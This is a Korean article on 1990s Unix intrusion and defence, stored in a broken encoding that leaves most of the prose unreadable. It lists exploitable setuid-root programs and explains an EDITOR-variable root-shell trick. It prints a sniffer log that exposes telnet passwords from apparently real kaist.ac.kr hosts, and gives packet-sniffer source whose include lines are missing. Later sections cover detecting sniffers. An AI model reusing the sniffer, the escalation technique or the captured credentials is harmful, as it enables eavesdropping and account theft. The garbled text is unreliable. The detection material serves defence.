NFS mount attack NIS domain name guessing Sendmail Attack X window System Attack WWW Attack NFS file handle guessing DNS hack IP Spoofing ±×¿Ü ´Ù¼ö(¿¹: rexd, AIX rlogin -froot...) ÇØÄ¿°¡ ½´ÆÛÀ¯ÀúÀÇ ±Ç¸®¸¦ ȹµæÇÏ´Â ¹æ¹ý¿¡´Â ¾î¶² °ÍÀÌ ÀÖ³ª. OS¸¶´Ù ´Ù¸£Áö¸¸ ´ëºÎºÐ Çã¼úÇÑ set-user-id root ÇÁ·Î±×·¥µéÀ» ÀÌ¿ëÇÑ´Ù. SunOS 4.1.x¸¦ ¿¹¸¦ µé¾îº¸¸é 1. /usr/local/bin/autoreply 2. /usr/ucb/rdist 3. /bin/mail race 4. /bin/passwd race 5. /usr/openwin/bin/loadmodule 6. sun sendmail 4.1 7. sendmail 8.6.9 debug hole À§ÀÇ ¸®½ºÆ®´Â ÀϹÝÀûÀ¸·Î Àß ¾Ë·ÁÁø °ÍµéÀε¥ ±×°Íµé ¸»°íµµ suid root ÇÁ·Î±×·¥µéÀ» ÀÏ´Ü ¸ðµÎ ½ºÄµÇغ» ÈÄ OS¿Ü¿¡ ´Ù¸¥ ¼Ò ÇÁÆ®¿þ¾î ÀνºÅç °úÁ¤¿¡¼­ »ý±ä °ÍÀÌ ÀÖÀ¸¸é system callµéÀ» ÃßÀûÇϸç Á¶»çÇÑ´Ù. Ȥ, ¼Ò½º ÆÄÀÏÀÌ °°ÀÌ ÀÖ´Ù¸é ÁÁ´Ù. ¾î´À suid root ÇÁ·Î±×·¥ÀÇ ¼Ò½º Áß¿¡¼­.. if (!(editor = getenv("EDITOR"))) editor = "vi"; if (fork()) (void) wait(&junk); else { (void) execlp(editor, editor, fname, NULL); fprintf(stderr, "Whoops! Failed to exec %s\n", editor); exit(1); } À§ÀÇ °æ¿ì¶ó¸é ÇØÄ¿´Â search path list¿¡(current directory)¸¦ ¸Ç óÀ½ ³õ°í ·çÆ® ½©À» ¸¸µå´Â vi ¶ó´Â ÀÚ½ÅÀÇ ÇÁ·Î±×·¥À» ¸¸ µç ÈÄ À§ÀÇ suid root ÇÁ·Î±×·¥À»½ÇÇà½ÃŲ´Ù. ±×·¯¸é ·çÆ® ±ÇÇÑÀ¸·Î ÇØÄ¿ÀÇ ÇÁ·Î±×·¥ÀÌ ½ÇÇàµÇ¾î ·çÆ®½©ÀÌ ¸¸µé¾îÁø´Ù. /usr/openwin/bin/loadmodule, IRIX 4.0.x ÀÇ /usr/lib/vadmin/serial_port µîÀ» ±×¿Í °°Àº Á¶°ÇÀ» ÀÌ¿ëÇؼ­ °ø°ÝÇÑ´Ù. ÄÄÇ»ÅÍ¿¡ ħÀÔÀÚ°¡ ÀÖ´ÂÁö ¾î¶»°Ô ÆľÇÇϴ°¡ °ü¸®ÀÚÀÇ Áö¼ÓÀûÀÎ °ü½ÉÀÌ Áß¿äÇÏ´Ù. ´Ã ½Ã½ºÅÛ ·Î±×¸¦ È®ÀÎÇÏ°í ÆÄÀÏ ½Ã½ºÅÛÀ» ¸ð´ÏÅÍÇÑ´Ù¸é Á¶±ÝÀÌ¶óµµ º¯È­°¡ »ý±â´õ¶óµµ ÆľÇÀÌ °¡´ÉÇÏ´Ù. º¸¾È °ü·Ã µµ±¸¿Í ÀÚ·á´Â ¾îµð¼­ ±¸ÇÒ ¼ö ÀÖ³ª http://www.cert.org http://www.8lgm.org http://www.cert-kr.or.kr news://comp.security.unix ftp://ftp.cert.org ftp://coast.cs.purdue.edu ftp://ftp.cert-kr.or.kr ÆÄÀ̾î¿ùÀº ¾î´À ¼±±îÁö ½Å·ÚÇÒ ¼ö ÀÖ³ª ¼³Ä¡¸¦ ÇÏ´Â »ç¶÷ÀÇ º¸¾È Áö½Ä ¹× ÆÄÀ̾î¿ù ÅøŶ ¸Å´º¾ó¿¡ ´ëÇÑ ÀÌÇØ Á¤µµ¿¡ µû¶ó ÆíÂ÷°¡ ½ÉÇÏ´Ù. »ó´ç¼öÀÇ ÆÄÀ̾î¿ùÀº À߸ø ¼Â¾÷µÈ ä ¿î¿µµÈ´Ù. ½Ã½ºÅÛ ¹× ³×Æ®¿öÅ© ¸ð´ÏÅ͸µÀ¸·Î ÀÎÇÑ ¼º´ÉÀúÇÏ¿Í °³°³ÀÎÀÇ ÇÁ¶óÀ̹ö½Ã ħÇع®Á¦´Â ¾î¶»°Ô ÇØ°áÇϳª? ½Ã½ºÅÛ ¸ð´ÏÅ͸µÀ¸·Î ÀÎÇÑ ¼º´É ÀúÇÏ´Â °ÅÀÇ ¾ø´Ù°í º¸¾Æµµ ÁÁ´Ù. ¼¼¼Ç ¸ð´ÏÅÍ ÅøÀÎ ttywatcher³ª ÆÄÀÏ ½Ã½ºÅÛ ¸ð´ÏÅÍ ÅøÀÎ tri pwire´Â °ü¸®ÀÚ°¡ ÇÊ¿äÇÒ ¶§ Àá½Ã »ç¿ëÇϰųª cron jobÀ¸·Î ½ÇÇàµÇ±â ¶§¹®¿¡ º°´Ù¸¥ ¿µÇâÀÌ ¾ø´Ù. ±×·¯³ª ³×Æ®¿öÅ© ¸ð´ÏÅ͸µÀº ¾öû³­ ¼º´É ÀúÇϸ¦ °¡Á®¿Â´Ù. ½ãÀÇ nit¸¦ »ç¿ëÇϸé ÇÊÅÍ ÆÐÅÏ¿¡ µû¶ó ´Þ¶óÁö±ä ÇÏÁö¸¸ 30~70%±îÁöÀÇ ÆÐŶ ¼Õ½ÇÀÌ »ý±â¹Ç·Î(spr ayÇßÀ» ¶§) ³×Æ®¿öÅ©ÂÊÀÇ ÆÛÆ÷¸Õ½º°¡ ¸¹ÀÌ ¶³¾îÁø´Ù. ±×·¡¼­ tcpdump 3.0ºÎÅÍ´Â BPF(BSD Packet Filter)¸¦ »ç¿ëÇÏ¿© ½ºÅà ±¸Á¶¸¦ »ç¿ëÇÏ´Â SunÀÇ NITº¸´Ù´Â 10~150¹è, CSPF(CMU/Stanford Packet Filter) º¸´Ù´Â 1.5~20¹è ºü¸¥ ¼º´ÉÇâ»óÀ» °ÅµÎ¾ú´Ù °³ÀÎÀÇ ÇÁ¹ÙÀ̹ö½Ã ħÇØ ¹®Á¦´Â °ü¸®ÀÚÀÇ µµ´ö¼º¿¡ ´Þ·Á Àִµ¥ ¿Ü±¹¿¡¼­´Â ½Ã½ºÅÛ, ȤÀº ½ÃÅ¥¸®Æ¼ °ü¸®ÀÚ´Â ¹Ýµå½Ã ¼±¼­¸¦ °Å Ä£´Ù°í ÇÑ´Ù. º¸¾ÈÀ» ÀϹæÀûÀ¸·Î °­È­ÇÏ´Ù º¸¸é ÄÄÇ»ÅÍÀÇ Æí¸®¼ºÀÌ ¶³¾îÁø´Ù°í Çϴµ¥, ¾î´À ¼±±îÁö º¸¾ÈÀ» °­È­ÇÏ´Â°Ô ¹Ù¶÷Á÷ÇÑ°¡. ÀÏ·Ê·Î XÀ©µµ¿ì ½Ã½ºÅÛÀÇ º¸¾ÈÀ» °­È­ÇÏ´Â °ÍÀ¸·Î MIT-MAGIC-COOKIE ¶ó´Â ÅäÅ«¹æ½ÄÀ» ÀÌ¿ëÇÑ xauth¶ó´Â ÇÁ·Î±×·¥ÀÌ ÀÖ´Ù. ±×·¯ ³ª ÀÌ°ÍÀÇ »ç¿ë¹æ¹ýÀº °¡È÷ »ìÀÎÀûÀÌ´Ù. X ¾ÖÇø®ÄÉÀ̼ÇÀ» ½ÇÇàÇÒ ¶§¸¶´Ù ÀÏÀÏÀÌ ÅäÅ«À» ³Ñ°ÜÁà¾ß Çϱ⠶§¹®ÀÌ´Ù. µû¶ó¼­ Àû´ç ÇÑ ¼±ÀÌ Áß¿äÇÏ´Ù. ±×¸®°í ±×°ÍÀº ÄÄÇ»ÅÍÀÇ Á߿伺¿¡ ¹ÐÁ¢ÇÑ °ü°è°¡ ÀÖ´Ù. ±¹°¡ Á¤º¸±â°üÀÇ È£½ºÆ®¿Í ÀÎÅÍ³Ý ½Ç½À¿ëÀ¸·Î »ç¿ë ÇÏ´Â ´ëÇÐÀÇ ³°Àº ¿öÅ©½ºÅ×À̼ÇÀ» ºñ±³Çؼ­ »ý°¢ÇÏ¸é µÈ´Ù. ½ÇÁ¦·Î ±¹³»ÀÇ ¸¹Àº ´ëÇÐÀÇ È£½ºÆ®µéÀº ÀüÇô º¸¾ÈÀÌ °í·ÁµÇ°í ÀÖÁö ¾Ê¾Æ¼­ Ãʺ¸ ÇØÄ¿µéÀÇ ÁÁÀº ¿¬½À ´ë»óÀÌ µÇ±âµµ ÇÑ´Ù. Àû´çÇÑ ¼±À» ½Ç¿ëÀûÀ¸·Î ±ÔÁ¤Áö¾î º»´Ù¸é "°ü¸®ÀÚÀÇ ¸ÞÀϹڽº¿¡ »ç¿ëÀÚµé·ÎºÎÅÍÀÇ ºÒÆò°ú ºÒ¸¸ ¸ÞÀÏÀÌ ½Ã½ºÅÛ ·Î±× ¸®Æ÷ Æ® ¸ÞÀϺ¸´Ù ´õ ¸¹ÀÌ ½×ÀÌ´Â ¶§ÀÌ´Ù" ÃֽŠÇØÅ· À¯Çüµé ÃÖ±Ù¿¡´Â ÇØÅ·±â¼úÀÌ °íµµ·Î ¹ß´ÞµÅ ¿¹Àü¿¡´Â »ó»óÇÒ ¼öµµ ¾ø¾ú´ø °í³­µµÀÇ ÇØÅ· ±â¼úµéÀÌ Á¸ÀçÇÏ°Ô µÆ´Ù. ¿¹Àü¿¡´Â ±â²¯ÇغÁ¾ß °ü¸®ÀÚÀÇ ½Ç¼ö³ª OS¿¡¼­ ½Ç¼ö¸¦ ÇÑ ÇÁ·Î±×·¥µéÀ» ¾Ç¿ëÇØ °ü¸®ÀÚÀÇ ±ÇÇÑÀ» ¾ò´Â °ÍÀÌ °íÀÛÀ̾úÁö¸¸, ÀÌÁ¦´Â ³×Æ®¿öÅ© »óÀ» Èê·¯´Ù´Ï´Â Á¤º¸ÀÇ ±âº»´ÜÀ§ÀÎ ÆÐŶ(packet: ³×Æ®¿öÅ©»ó¿¡ Á¤º¸ ¸¦ ¼Û¼ö½ÅÇÒ ¶§ °¡Àå ±âº»ÀÌ µÇ´Â Á¤º¸´ÜÀ§)À» ÇϳªÇϳª Á¶ÀÛÇØ ÇØÅ·À» ÇÏ°Ô µÆ´Ù. ÀÌ·± °í³­µµ ÇØÅ·ÀÇ ¿¹´Â ÆÐŶ ½º´ÏÆÛ¸µ(packet sniffing)°ú, IP ½ºÇªÇÎ(IP Spoofing: IP »ç±âÄ¡±â), NFS(Network File System) file handle guessing, dns server cache poisoning(³×ÀÓ ¼­¹ö(IP ¿¡ ÀÏ´ëÀÏ ¸ÅÄ¡µÇ´Â ³×ÀÓ ¾îµå·¹½º¸¦ °ü¸®Çϴ ȣ½ºÆ®)¿¡ Àâ ÀÔÇØ°¡Â¥ È£½ºÆ®µéÀ» ¸¸µé°í ³ª¿À´Â °Í) µîÀÌ Àִµ¥ ÀÌÁß¿¡¼­ ½º´ÏÆÛ¸µ°ú ½ºÇªÇο¡ ´ëÇؼ­¸¸ ´Ù·ï º¸±â·Î ÇÏÀÚ. °¡Àå ½É°¢ÇÑ ÇØÅ· ±â¼ú, Sniffing ÆÐŶµéÀº ÀÌ´õ³Ý ÄÉÀ̺íÀ» Ÿ°í Àü¼ÛÀÌ µÈ´Ù. ÀÌ ÆÐŶµéÀº ¾î¶² À¯Àú°¡ ¾î´À È£½ºÆ®¿¡ ·Î±äÇß´Ù´Â Á¤º¸µûÀ§¸¦ °¡Áö°í Àִµ¥, ÀÌ´õ³Ý µð¹ÙÀ̽º¸¦ ÄÁÆ®·ÑÇØ Èê·¯°¡´Â ÆÐŶ¿¡¼­ ¿øÇÏ´Â Á¤º¸ÀÎ À¯ÀúµéÀÇ Æнº¿öµå¸¦ ¾Ë¾Æ³»´Â °ÍÀ¸·Î¼­ ¿äÁò °¡Àå ½É°¢ÇÑ ¹®Á¦°¡ µÇ´Â ÇØÅ· ±â¼úÀÌ´Ù. ÃÖ±Ù ÇØÄ¿µéÀÇ °ø°ÝµéÀÇ Åë°è¸¦ ³»º» ÀڷḦ º¸¸é ½º´ÏÇο¡ ÀÇÇÑ °ø°ÝÀÌ °¡Àå ¸¹Àº °ÍÀ¸·Î ³ªÅ¸³ª°í ÀÖ´Ù. ½º´ÏÆÛ(Sniffer)¶õ ¹«¾ùÀΰ¡? ½º´ÏÆÛ´Â ³×Å©¿öÅ©ÀÇ ÇÑ È£½ºÆ®¿¡¼­ ½ÇÇàµÇ¾î ±× ÁÖÀ§¸¦ Áö³ª ´Ù´Ï´Â ÆÐŶµéÀ» ¿³º¸´Â ÇÁ·Î±×·¥À¸·Î¼­ °èÁ¤°ú Æнº¿öµå¸¦ ¾Ë¾Æ ³»±â À§Çؼ­ ħÀÔÀڵ鿡 ÀÇÇØ ÀÚÁÖ »ç¿ëµÇ´Âµ¥ ¾Æ¹«¸® ³×Æ®¿öÅ© º¸¾È¿¡ ½Å°æÀ» ¾´ È£½ºÆ®¶óµµ ÁÖº¯ÀÇ È£½ºÆ®°¡ °ø°Ý´çÇؼ­ ½º´Ï ÇÎÀ» À§ÇØ »ç¿ëµÈ´Ù¸é ¹«·ÂÇØÁú ¼ö ¹Û¿¡ ¾ø´Ù. ÀÌÇظ¦ µ½±â À§ÇØ ½ÇÁ¦ ½º´ÏÇÎ ¼¼¼ÇÀ» °¡Áö°í ¼³¸íÇÑ´Ù. mordor# ./sniffit Log started at => Mon Apr 8 20:29:04 [pid 10937] -- TCP/IP LOG -- TM: Mon Apr 8 20:29:44 -- PATH: rohan.kaist.ac.kr(1270) => gondor.kaist.ac.kr(telnet) STAT: Mon Apr 8 20:29:48, 30 pkts, 77 bytes [TH_FIN] DATA: (255)(253)^C(255)(251)^X(255)(251)^_(255)(251) (255)(251)!(255)(251)"(255)(253)^E(255)(251)#(255)(251)$(255)(250)^X : IRIS-ANSI-NET(255)(240)(255)(253)^A(255)(252)^Aaragorn : evenstar : cls : du -s -k * : elm awen -- TCP/IP LOG -- TM: Mon Apr 8 20:31:57 -- PATH: mordor.kaist.ac.kr(2389) => gondor.kaist.ac.kr(telnet) STAT: Mon Apr 8 20:32:24, 106 pkts, 128 bytes [DATA LIMIT] DATA: (255)(253)&(255)(251)&(255)(253)^C(255)(251)^X(255)(251)^_(255)(251) (255)(251)!(255)(251)"(255)(251)$(255)(253)^E(255)(251)#(255)(250)^_ : P : ^X(255)(240)(255)(250) : 9600,9600(255)(240)(255)(250)^X : XTERM(255)(240)(255)(253)^A(255)(252)^Agaladriel : shwjdtjr=JD : : setenv DISPLAY rohan.kaist.ac.kr:0.0 : ne À§´Â ½º´ÏÆÛ ÇÁ·Î±×·¥À» µ¹¸° °á°úÀÌ´Ù. gondor, mordor, rohanÀº MÇаúÀÇ Àü»ê½ÇÀÇ ±â°èµéÀε¥ ÀÌ¹Ì Ä§ÀÔÀÚ´Â mordor¿¡¼­ ·çÆ® ±ÇÇÑÀ» µû³Â¾ú°í ½º´ÏÆÛ ÇÁ·Î±×·¥À» ½ÇÇà½ÃÅ°°í ÀÖ´Ù(½º´ÏÆÛ°¡ µ¿ÀÛÇϱâ À§Çؼ­´Â ³×Å©¿öÅ© µð¹ÙÀ̽ºÀÇ Á¶ÀÛÀÌ ÇÊ¿äÇѵ¥ ÀÌ´Â ·çÆ®(½Ã½ºÅÛ °ü¸®ÀÚ)¸¸ÀÌ ÇÒ ¼ö ÀÖ´Ù). ±×·¸´Ù¸é ¹°¸®ÀûÀÎ ³×Å©¿öÅ© ±¸µµ¿¡¼­ ÀÎÁ¢ÇØÀִ ȣ½ºÆ®µéÀº ¸ðµÎ ½º´ÏÇÎÀ» ´çÇÏ°Ô µÈ´Ù . óÀ½ ºí·°¿¡¼­ rohan¿¡¼­ gondor·Î aragornÀ̶ó´Â °èÁ¤À¸·Î telnet ·Î±äÀ» ÇÑ °ÍÀÌ ÀâÇû´Âµ¥ À̶§ Æнº¿öµå°¡ evenstarÀÓÀ» ¾Ë ¼ö ÀÖ´Ù. ±×¸®°í ·Î±ä Á÷ÈÄ¿¡ ½ÇÇàÇÑ ¸î¸î ¸í·É±îÁö ÀâÇû´Ù. ÀϹÝÀûÀ¸·Î ½º´ÏÆÛ ÇÁ·Î±×·¥Àº ºñ±³Àû ÀÛÀº Å©±âÀÇ Á¦ÇÑµÈ ¹öÆÛ¸¦ »ç¿ëÇϴµ¥ ÇÊ¿ä¿¡ µû¶ó ±×°ÍÀ» ´ÃÀ̱⵵ ÇÑ´Ù. ÀÌ´õ³ÝÀÇ ¼³°è»ó ¾àÁ¡°ú ³×Æ®¿öÅ© ½º´ÏÆÛÀÇ ¿ø¸® °¡Àå ÀϹÝÀûÀÎ LANÀÇ ±¸¼º ¹æ¹ýÀº ÀÌ´õ³ÝÀ» »ç¿ëÇÏ´Â °ÍÀ¸·Î ÁÖº¯¿¡¼­ °¡Àå ½±°Ô Á¢ÇÏ´Â °æ¿ìÀÌ´Ù. ÀÌ´õ³ÝÀ» ÅëÇÑ Åë½Å ¹æ¹ýÀº ¸Å¿ì °£´ÜÇÏ´Ù. A¶ó´Â È£½ºÆ®°¡ B¶ó´Â È£½ºÆ®·Î ÆÐŶÀ» º¸³»°í ½Í´Ù¸é È£½ºÆ® A´Â B¿ÍÀÇ ¹èŸÀûÀÎ ¿¬°áÀ» ÅëÇÏ´Â °ÍÀÌ ¾Æ´Ï¶ó ±× ÆÐŶÀ» ÀÌ´õ³Ý¿¡ »Ñ¸°´Ù. ±×¸®°í ±× ÆÐŶÀº ÀϹÝÀûÀ¸·Î ¼ö½Å ÁÖ¼ÒÀÇ È£½ºÆ®¸¸ÀÌ ¹Þµµ·Ï ±â´ëµÈ´Ù. Áï ÀϹÝÀûÀ¸·Î Àڽſ¡°Ô ¿ÀÁö ¾Ê´Â ÆÐŶÀº ¹ÞÁö ¾ÊÀ¸¹Ç·Î È£½ºÆ® B¸¸ÀÌ A°¡ º¸³»´Â ÆÐŶÀ» ¹Þ°Ô µÈ´Ù. ±×·¯³ª ±×°ÍÀº ±â´ë »çÇ×ÀÏ »Ó ¾ðÁ¦¶óµµ ±ú¾îÁú À§ÇèºÎ´ãÀ» ¾È°í ÀÖ´Â ÇÁ·ÎÅäÄÝÀÌ´Ù. ³×Å©¿öÅ© µð¹ÙÀ̽º´Â Àڽſ¡°Ô ¿ÀÁö ¾Ê°í ´Ù¸¥ È£½ºÆ®¸¦ ÇâÇØ Áö³ª°¡´Â ÆÐŶ±îÁö ¹Þ´Â »óÅ¿¡ µé¾î°¥ ¼ö Àִµ¥, ±×¶§¸¦ 'Promiscuous mode'¶ó°í ºÎ¸¥´Ù. ½º´ÏÆÛ´Â ¹Ù·Î ±× »óÅ¿¡¼­ µ¿ÀÛÇÑ´Ù. ÀÌ·¸°Ô ³×Æ®¿öÅ©ÀÇ ¼³°è»óÀÇ Ä¿´Ù¶õ ¾àÁ¡ÀÌ Àֱ⠶§¹®¿¡ ½º´ÏÆÛ¿¡ ÀÇÇÑ °ø°ÝÀº Ä¡¸íÀûÀ̸ç ÀϺΠOS¸¦ Á¦ ¿ÜÇÏ°í´Â ã¾Æ³»±â°¡ °ï¶õÇÑ °æ¿ì°¡ ¸¹°í ¸·±â À§Çؼ­µµ ¸¹Àº ºÎ´ãÀÌ µû¸¥´Ù. ½º´ÏÆÛÀÇ ¼³°è ½º´ÏÆÛ´Â ³Ê¹«³ª ½±°í, ºñ¿­ÇÏ°Ô ÇØÅ·À» ÇÒ ¼ö Àֱ⠶§¹®¿¡ ÇØÄ¿µé °£¿¡¼­´Â ½º´ÏÆÛ¸¦ ÀÌ¿ëÇÏ´Â ÇØÄ¿¸¦ 3·ù Ãë±ÞÇØ »ó´ëµµ ÇÏÁö ¾Ê´Â´Ù. ÀÌó·³ ½º´ÏÆÛ´Â ÇØÄ¿µé »çÀÌ¿¡¼­Á¶Â÷ ±Ý±â(?)½ÃµÇ´Â Ä¡»çÇÑ ÇÁ·Î±×·¥ÀÌÁö¸¸ ±× ÀÚü·Î´Â ¾ÆÁÖ ÈǸ¢ÇÑ ³×Å©¿öÅ© ÇÁ·Î±× ·¥ÀÌ´Ù. ½ÇÁ¦·Î ´ëºÎºÐÀÇ ³×Æ®¿öÅ© ºÐ¼® ÇÁ·Î±×·¥µéÀº Promiscuous mode¿¡¼­ µ¿ÀÛÇÏ¸ç ¶Ç ±×·² ¼ö¹Û¿¡ ¾ø´Ù. ±×¸®°í ½º´ÏÆÛÀÇ ÇÙ½ÉÀ» ÀÌ·ç´Â ÄÚµå´Â ´ëºÎºÐÀÇ OS¿¡¼­ µ¶¸³µÈ ÇÁ·ÎÅäÄݷμ­ Áö¿øÀ» Çϴµ¥ SunOSÀÇ NIT, IRIXÀÇ SNOOPÀÌ ÁÁÀº ¿¹ÀÌ´Ù. À߸¸ ÀÌ¿ëÇϸé ħÀÔÀÚµéÀ» »ó´ëÇÏ´Â °ü¸®Àڵ鿡°Ô Å«¹«±â°¡ µÉ ¼ö ÀÖ´Ù. ³×Æ®¿öÅ©¸¦ °¨½ÃÇÏ´Â µ¥ »ç¿ëÇÒ ¼ö ÀÖ´Ù´Â ¸» ÀÌ´Ù. netlog(ftp://ftp.cert-kr.or.kr/pub/tools/etc/netlog/netlog-1.2.tar.gz)¶ó´Â ÁÁÀº ÅøÀÌ ÀÌ¹Ì ÀÖ´Ù. ÀÌ ÅøÀÇ ¼º°ÝÀ» Àß ¸»ÇØÁÖµíÀÌ telnet°ú ftpÀÇ ¸ðµâÀº Á¦¿ÜµÅ ÀÖ´Ù. Æнº¿öµå ½º´ÏÇο¡ »ç¿ëµÇ´Â °ÍÀ» ¸·±â À§ÇÔÀÏ °ÍÀÌ´Ù. ½º´ÏÆÛ´Â ÀϹÝÀûÀ¸·Î ´ÙÀ½°ú °°Àº ÀÏ·ÃÀÇ µ¿ÀÛÀ» ÇÏ´Â ÄÚµå·Î ±¸¼ºµÈ´Ù. 1. ³×Æ®¿öÅ© µð¹ÙÀ̽º¸¦ ¿­¾î¼­ Promiscuous mode·Î ¸¸µç´Ù. 2. Áö³ª°¡´Â ¸ðµç ÆÐŶÀ» Àд´Ù. 3. ÆÐŶÀ» ÇÊÅ͸µÇؼ­ ¹ß½Å ¹× ¼ö½Å ÁÖ¼Ò, ¼­ºñ½º(telnet, rlogin, ftp, smtp µî), ±×¸®°í °èÁ¤°ú Æнº¿öµå°¡ Æ÷ÇÔµÈ µ¥ÀÌÅ͸¦ ±¸ºÐÇؼ­ Ãâ·ÂÇÑ´Ù. 3¹øÀÇ ±â´ÉÀ» ÇÏ´Â Äڵ尡 »ý·«µÈ ½º´ÏÆÛ ¼Ò½º¸¦ Âü°í·Î ¼Ò°³ÇÑ´Ù. IRIX¿¡¼­ SNOOPÀ» »ç¿ëÇØ Á¦À۵Ǿú´Ù. /* sgisniff.c by poison@baikdu.kaist.ac.kr uses SNOOP(7P) tested on IRIX 5.2, 5.3 */ #include #include #include #define ETHERHDRPAD RAW_HDRPAD(sizeof(struct ether_header)) struct etherpacket { struct snoopheader snoop; char pad[ETHERHDRPAD]; struct ether_header ether; char data[ETHERMTU]; }; main() { int s; struct sockaddr_raw sr; struct snoopfilter sf; struct etherpacket ep; int cc = 60000, on = 1; char buf[100]; s = socket(PF_RAW, SOCK_RAW, RAWPROTO_SNOOP); sr.sr_family = AF_RAW; sr.sr_port = 0; strncpy(sr.sr_ifname, "ec0", sizeof sr.sr_ifname); bind(s, &sr, sizeof sr); memset((char *)&sf, 0, sizeof sf); ioctl(s, SIOCADDSNOOP, &sf); setsockopt(s, SOL_SOCKET, SO_RCVBUF, (char *) &cc, sizeof cc); ioctl(s, SIOCSNOOPING, &on); for (;;) { cc = read(s, (char *) &ep, sizeof ep); write(1, (char *)&ep, sizeof ep); sleep(2); } } ½º´ÏÆÛ, ±× ´ëÃ¥°ú ¿¹¹æ ½º´ÏÆÛ Å½Áö ½º´ÏÆÛ´Â Promiscuous mode¿¡¼­ µ¿ÀÛÇϱ⠶§¹®¿¡ ³×Å©¿öÅ© µð¹ÙÀ̽ºÀÇ »óÅ Ç÷¡±×¿¡ 'PROMISC'°¡ ÀÖ´Ù¸é ÀÏ´Ü ½º´ÏÆÛ°¡ µ¹°í ÀÖ´Ù°í »ý°¢Çصµ ÁÁ´Ù. SunOS 4.1.x °°Àº BSD °è¿­ÀÇ À¯´Ð½º³ª IRIX¿¡¼­´Â 'ifconfig'¸¦ »ç¿ëÇؼ­ ½º´ÏÆÛÀÇ Á¸À縦 È®ÀÎÇÒ ¼ö ÀÖ À¸³ª ´ëºÎºÐÀÇ ´Ù¸¥ À¯´Ð½º(ƯÈ÷ Solaris)¿¡¼­´Â ±×°ÍÀÌ ºÒ°¡´ÉÇÏ´Ù. [baikdu:/circ/kus/poison 2 ] uname -a SunOS baikdu 4.1.3-KL 3 sun4m [baikdu:/circ/kus/poison 3 ] ifconfig le0 le0: flags=163 inet 143.248.1.8 netmask ffffff00 broadcast 143.248.1.0 [eru:/eldar/people/poison 16 ] uname -a IRIX eru 5.3 11091812 IP22 mips [eru:/eldar/people/poison 17 ] ifconfig ec0 ec0: flags=d63 inet 134.75.100.53 netmask 0xffff0000 broadcast 134.75.255.255 SunOS 4.1.3, IRIX 5.3 ¿¡¼­ ½º´ÏÆÛ ÇÁ·Î±×·¥À» ½ÇÇà½ÃÅ°¸é¼­ ifconfig·Î È®ÀÎÇÏ¸é ´ÙÀ½°ú °°´Ù. µÎ ±â°è¿¡¼­ ¸ðµÎ flags¸¦ ³ªÅ¸³»´Â Çà¿¡ 'PROMISC'°¡ ÀÖ´Â °ÍÀ¸·Î ½º´ÏÆÛ°¡ È®ÀεȴÙ. SunOS 4.1.x¿¡¼­ »ç¿ë°¡´ÉÇÑ cpmÀ̶ó´Â ÇÁ·Î±×·¥ÀÌ Àִµ¥ ifconfig·Î Ç÷¡±×¸¦ Á¶»çÇÏ´Â °Í°ú °°Àº ±â´ÉÀ» °¡Áø´Ù. ÀϹÝÀûÀ¸·Î ½º´ÏÆÛ´Â ·Î±× ÆÄÀÏÀ» ¸¸µé¾î µ¥ÀÌÅ͸¦ ¸ðÀº´Ù. µû¶ó¼­ ±× ·Î±× ÆÄÀÏÀ» ãÀ» ¼ö ÀÖÀ¸¸é ½º´ÏÆÛ¸¦ ã±â°¡ ½¬¾îÁø´Ù. ¿ì¼± ´ÙÀ½°ú °°Àº °£´ÜÇÑ ¹æ¹ýÀÌ ÀÖ´Ù. ´Ù¸¥ È£½ºÆ®·Î ¿¬°áÀ» ÇÏ¸é ½º´ÏÆÛ ·Î±× ÆÄÀÏ¿¡ ·Î±×°¡ »õ·Î ¸¸µé¾îÁö°Ô µÇ¹Ç·Î¹Ì¸® ¸¸µé¾î µÎ¾ú´ø /tmp/sniff_trapÀ̶õ ÆÄÀÏÀ» ±âÁØÀ¸·Î ÇØ Ã£À» ¼ö°¡ ÀÖ´Ù. ´Ü ºü¸¥ °á°ú¸¦ À§ÇØ ·çÆ®¿¡¼­ ÇÁ·Î¼¼½ºÀÇ ¿ì¼±±ÇÀ» ÃÖ´ë·Î ÇÑ´Ù. º¸´Ù È®½ÇÈ÷ Çϱâ À§Çؼ­ ÇöÀç ¿­·ÁÁ® ÀÖ´Â ¸ðµç ÆÄÀÏÀÇ ¸®½ºÆ®¸¦ ¾Ë ¼ö ÀÖ´Ù¸é ±× ¼Ó¿¡ ½º´ÏÆÛ ·Î±× ÆÄÀϵµ Æ÷ÇԵŠÀÖÀ» °ÍÀ̹ǷΠ½º´ÏÆÛ¸¦ ã´Âµ¥ µµ¿òÀÌ µÈ´Ù. lsof(ftp://ftp.cert-kr.or.kr/pub/tools/lsof) À̶ó´Â ÅøÀÇ »ç¿ëÀ» ±ÇÇÑ´Ù. ½º´ÏÆÛ ·Î±× ÆÄÀÏÀ» ã¾Æ ¾ø¾Ý´Ù¸é ½º´ÏÆÛ ÇÁ·Î¼¼½º¸¦ ãµµ·Ï ³ë·ÂÇغ»´Ù. ½Ã½ºÅÛÀ» ¸®ºÎÆÃÇÏ¸é µÇ°ÚÁö¸¸ ±×º¸´Ù ħÀÔÀÚ¸¦ ÃßÀû ÇÏ°í ½Í´Ù¸é ±× ÇÁ·Î¼¼½º¸¦ Á÷Á¢ ã¾Æ³»´Â °ÍÀÌ ¹Ù¶÷Á÷ÇÏ´Ù. ·çÆ®·Î ½ÇÇàµÇ°í ÀÖ´Â ÇÁ·Î¼¼½ºÁß¿¡¼­ ¼ö»óÇÑ °ÍµéÀ» ã´Â´Ù. ./a.out, ./in.telnetd, in.uucpd µîÀ¸·Î ¼û°ÜÁö´Â°Ô º¸ÅëÀε¥ ¾Ë¾Æ³»±â ¾î·ÆÀÝ´Ù. # touch /tmp/sniff_trap # telnet gondor.kaist.ac.kr SunOS UNIX (gondor) login: blah Password: Login incorrect login:^D Connection closed by foreign host. # nice -19 find / -newer /tmp/sniff_trap -print BSD ps(/usr/ucb/ps)°¡ »ç¿ë °¡´ÉÇÏ´Ù¸é e¿É¼ÇÀ» Ãß°¡Çؼ­ ÇÁ·Î¼¼½º°¡ ½ÃÀÛµÆÀ» ¶§ÀÇ È¯°æº¯¼ö¸¦ ¾Ë¾Æ³»¾î ¾î¶² °èÁ¤ÀÌ ÇØÅ·¿¡ »ç¿ëµÆ´ÂÁö¸¦ ¾Ë¾Æ³¾ ¼ö ÀÖ´Ù. ¾î¶»°Ô ¿¹¹æÇØ¾ß Çϳª? ½º´ÏÆÛ¿¡ ´ëºñÇÏ´Â ¹æ¹ýÀÇ ¿øÄ¢Àº Æнº¿öµå°¡ ³×Æ®¿öÅ©¸¦ ÅëÇØ Àü´ÞµÇÁö ¾Ê°Ô ÇÏ´Â °ÍÀÌ´Ù. 